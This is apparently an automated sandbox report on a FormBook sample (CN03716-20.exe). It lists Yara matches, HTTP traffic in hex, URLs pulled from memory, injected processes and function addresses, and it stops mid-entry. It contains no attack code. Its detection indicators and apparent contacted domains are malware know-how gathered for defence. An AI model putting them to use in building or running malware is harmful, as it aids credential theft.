 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Sep 2020 14:47:03 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: no-cachecontent-language: enx-wix-request-id: 1600699623.782789711115195vary: Accept-EncodingAge: 0X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjTybE2BzSWtM7HTFP9VFEC,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijnEXQ2/68Un6qnh1J4MeNs1WIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI0uHmepHlxDNsmSKhfIbcIJWd3xniMsr1HjrszKGvMzr,2UNV7KOq4oGjA5+PKsX47FDtGCr72w4BMu4v3sd6ZGU=,qquldgcFrj2n046g4RNSVO41WPKnFMbc7ID/2Bjixvw=,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UOYNUEAXqn/WZl+iQhS1dpQ4tYPCIn0xdi8lnDzR9qKl0JDQPGidxH0yAUk8YNY2WIHlCalF7YnfvOr2cMPpyw==,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,IaDuTAMGGvhXtruM6nHg6saWad6chcA1IdKNJ2oysB5NG+KuK+VIZfbNzHJu0vJu,a3Wp9ZyujRzrXdcjNnttJroCVlUX3HA8CNXa/Wj4FZ9Y2J424u2BB5qsIDUDYaV+I5gzac6Ha/CTe5yTy9BfOQ==Server: Pepyaka/1.19.0Data Raw: 62 64 30 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 Data Ascii: bd0
 Urls found in memory or binary data Show sources
 Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: http://browsehappy.com/ Source: CN03716-20.exe, 00000000.00000003.260996277.0000000005E09000.00000004.00000001.sdmp String found in binary or memory: http://en.w Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.257621308.0000000005E3D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: http://i.cdnpark.com/themes/registrar/791105.css Source: CN03716-20.exe, 00000000.00000002.290578484.0000000002EA1000.00000004.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.504570205.0000000003391000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comC Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comCon Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comS Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comVM Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comn-uD Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comnMD Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comv-s- Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comvMn Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: CN03716-20.exe, 00000000.00000003.263942943.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/ Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: CN03716-20.exe, 00000000.00000003.264788683.0000000005E0C000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlS Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designerss Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersy Source: CN03716-20.exe, 00000000.00000003.264319642.0000000005E33000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersz Source: CN03716-20.exe, 00000000.00000002.290344600.0000000001537000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.comF Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: CN03716-20.exe, 00000000.00000003.257242203.0000000005E3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com7 Source: CN03716-20.exe, 00000000.00000003.257293184.0000000005E3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com8 Source: CN03716-20.exe, 00000000.00000003.257143704.0000000005E3D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comW Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnBM- Source: CN03716-20.exe, 00000000.00000003.259637169.0000000005E0E000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnI Source: CN03716-20.exe, 00000000.00000003.259751017.0000000005E11000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnS Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cna-e. Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnn-u Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnormN Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnr-t Source: CN03716-20.exe, 00000000.00000003.268205417.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/ Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: CN03716-20.exe, 00000000.00000003.271944510.0000000005E0B000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmp String found in binary or memory: http://www.lifecoachwoman.com Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmp String found in binary or memory: http://www.lifecoachwoman.com/cmg/ Source: CN03716-20.exe, 00000000.00000003.267987189.0000000005E03000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype. Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com2 Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.comS Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.comtM Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: CN03716-20.exe, 00000000.00000003.260108438.0000000005E0C000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com5 Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.co Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn(M Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnCo: Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnS Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnbr? Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnseV Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open Source: control.exe, 00000010.00000002.519302835.0000000000498000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Ll
 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 0_2_014794A8 0_2_014794A8 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 0_2_0147DB4C 0_2_0147DB4C Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 0_2_0147C3A0 0_2_0147C3A0 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 0_2_0147E211 0_2_0147E211 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 0_2_0147A758 0_2_0147A758 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_00401030 7_2_00401030 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_0041D363 7_2_0041D363 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_00402D87 7_2_00402D87 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_00402D90 7_2_00402D90 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_00409E1B 7_2_00409E1B Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_00409E20 7_2_00409E20 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_0041DED5 7_2_0041DED5 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_0041CEE6 7_2_0041CEE6 Source: C:\Users\user\Desktop\CN03716-20.exe Code function: 7_2_00402FB0 7_2_00402FB0 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_0453D466 16_2_0453D466 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04531002 16_2_04531002 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_0448841F 16_2_0448841F Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_045428EC 16_2_045428EC Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_0448B090 16_2_0448B090 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_044A20A0 16_2_044A20A0 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_045420A8 16_2_045420A8 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04541D55 16_2_04541D55 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_0447F900 16_2_0447F900 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04542D07 16_2_04542D07 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04470D20 16_2_04470D20 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04494120 16_2_04494120 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_045425DD 16_2_045425DD Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_0448D5E0 16_2_0448D5E0 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_044A2581 16_2_044A2581 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04496E30 16_2_04496E30 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04542EF7 16_2_04542EF7 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_045422AE 16_2_045422AE Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04542B28 16_2_04542B28 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_0453DBD2 16_2_0453DBD2 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_04541FF1 16_2_04541FF1 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_044AEBB0 16_2_044AEBB0 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004ED364 16_2_004ED364 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004D2D87 16_2_004D2D87 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004D2D90 16_2_004D2D90 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004D9E1B 16_2_004D9E1B Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004D9E20 16_2_004D9E20 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004EDED5 16_2_004EDED5 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004ECEE6 16_2_004ECEE6 Source: C:\Windows\SysWOW64\control.exe Code function: 16_2_004D2FB0 16_2_004D2FB0 Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Code function: 26_2_016E94A8 26_2_016E94A8 Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Code function: 26_2_016EDB4C 26_2_016EDB4C Source: C:\Program Files 